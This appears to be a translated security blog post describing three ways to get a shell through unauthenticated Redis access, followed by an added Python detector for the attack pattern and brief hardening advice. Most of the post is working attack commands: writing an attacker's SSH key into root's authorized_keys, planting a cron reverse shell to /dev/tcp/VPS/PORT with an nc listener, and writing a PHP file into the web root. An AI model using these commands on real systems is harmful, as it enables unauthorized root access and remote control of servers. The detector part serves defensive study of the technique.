Using a Redis Unauthorized Access Vulnerability to Get a Shell (getshell)

(1) Write an ssh-keygen public key and log in with the private key. This method works under the following conditions:

The Redis service was started as root, and the SSH service is running with key-based login allowed. A public key can then be written remotely and used to log in to the server directly.

1: Generate the SSH key pair locally
ssh-keygen -t rsa

Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): ./id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa.
Your public key has been saved in ./id_rsa.pub.
The key fingerprint is:
SHA256:P24CPwgr75TtlEAgIY95v7mcAWpd7S6N1KGhi7hHO6s root@kali
The key’s randomart image is:
+--[RSA 3072]----+
|+... |
|.= . |
|o o . |
| . o ... |
| . +.+.S |
| .oooOoo . |
|oo.oOo*= o |
|o.=+.Oo.+... |
|E+.** o. +. |
+---[SHA256]-----+

2: Write the public key, padded with blank lines, into a file
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n")>test.txt

3: Send the file contents to the Redis server as a key
cat test.txt |redis-cli -h IP -x set test

4: Connect to the remote Redis server and check that the public key is stored
redis-cli -h IP

keys *

get test

5: View the current dump directory and file name
config get dir
config get dbfilename

6: Set the dump directory
config set dir "/root/.ssh/"

7: Set the dump file name
config set dbfilename "authorized_keys"

8: Save
save

9: Connect over SSH
ssh -i id_rsa IP -l root

10: Delete the key


(2) Use a cron job to execute a command that opens a reverse shell

1: Start a listener on the attacker's machine

nc -lvnp PORT

2: Execute commands through redis-cli

redis-cli -h IP

set x "\n* * * * * bash -i >& /dev/tcp/VPS/PORT 0>&1\n"

3: Set the dump directory
config set dir /var/spool/cron/

4: Set the dump file name
config set dbfilename root

5: Save
save


(3) Write a webshell to the web root directory

config set dir /var/www/html/

config set dbfilename shell.php

set x "<?php phpinfo();?>"

save
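All three techniques above share one fingerprint: CONFIG SET dir and CONFIG SET dbfilename are pointed at a sensitive location and then SAVE or BGSAVE is issued. The following detector is an added example, not part of the original post; it parses `redis-cli MONITOR` output (the `<time> [<db> <client>] "CMD" "arg"...` line format) and flags that sequence. The sample log lines are constructed, and the lists of suspicious directories and file names are my own choice.

```python
import re

# One line of `redis-cli MONITOR` output: <unix time> [<db> <client>] "CMD" "arg" ...
MONITOR_RE = re.compile(r'^(\d+\.\d+) \[\d+ ([^\]]+)\] (.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Places an RDB dump has no business being written to (SSH keys, cron spool,
# web root, as in the three cases above); extend these for your environment.
SUSPICIOUS_DIRS = ("/root/.ssh", "/home/", "/var/spool/cron", "/etc/cron", "/var/www")
SUSPICIOUS_NAMES = ("authorized_keys", "root")
SUSPICIOUS_SUFFIXES = (".php", ".jsp", ".aspx", ".sh")

def parse_monitor_line(line):
    """Return (client, [args...]) or None if the line is not MONITOR output."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    return m.group(2), ARG_RE.findall(m.group(3))

def detect_rdb_file_drop(monitor_lines):
    """Flag SAVE/BGSAVE issued while dir/dbfilename point somewhere sensitive.
    CONFIG SET is server-global, so state is tracked once, not per client."""
    cfg = {"dir": "", "dbfilename": "dump.rdb"}   # Redis default file name
    alerts = []
    for line in monitor_lines:
        parsed = parse_monitor_line(line)
        if not parsed or not parsed[1]:
            continue
        client, args = parsed
        cmd = args[0].upper()
        if cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET":
            if args[2].lower() in cfg:
                cfg[args[2].lower()] = args[3]
        elif cmd in ("SAVE", "BGSAVE"):
            d, f = cfg["dir"], cfg["dbfilename"]
            bad_dir = any(d.startswith(p) for p in SUSPICIOUS_DIRS)
            bad_name = f in SUSPICIOUS_NAMES or f.endswith(SUSPICIOUS_SUFFIXES)
            if bad_dir or bad_name:
                alerts.append((client, "%s would write %s/%s" % (cmd, d.rstrip("/"), f)))
    return alerts

# Constructed MONITOR output: one benign client, then the three sequences above.
SAMPLE_MONITOR = """\
1700000000.1 [0 10.0.0.9:5151] "CONFIG" "SET" "dir" "/var/lib/redis"
1700000000.2 [0 10.0.0.9:5151] "SAVE"
1700000001.1 [0 10.0.0.5:41234] "CONFIG" "SET" "dir" "/root/.ssh/"
1700000001.2 [0 10.0.0.5:41234] "CONFIG" "SET" "dbfilename" "authorized_keys"
1700000001.3 [0 10.0.0.5:41234] "SAVE"
1700000002.1 [0 10.0.0.7:6000] "CONFIG" "SET" "dir" "/var/spool/cron/"
1700000002.2 [0 10.0.0.7:6000] "CONFIG" "SET" "dbfilename" "root"
1700000002.3 [0 10.0.0.7:6000] "SAVE"
1700000003.1 [0 10.0.0.8:7000] "CONFIG" "SET" "dir" "/var/www/html/"
1700000003.2 [0 10.0.0.8:7000] "CONFIG" "SET" "dbfilename" "shell.php"
1700000003.3 [0 10.0.0.8:7000] "BGSAVE"
""".splitlines()
```

Running `detect_rdb_file_drop(SAMPLE_MONITOR)` returns three alerts, one per attacking client, and none for the benign client; the same logic can be fed from a Redis access log or a network capture. Preventing the pattern in the first place means binding Redis to localhost, enabling protected-mode and requirepass, and renaming or disabling CONFIG.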


Source: blog.csdn.net/weixin_44146996/article/details/112542002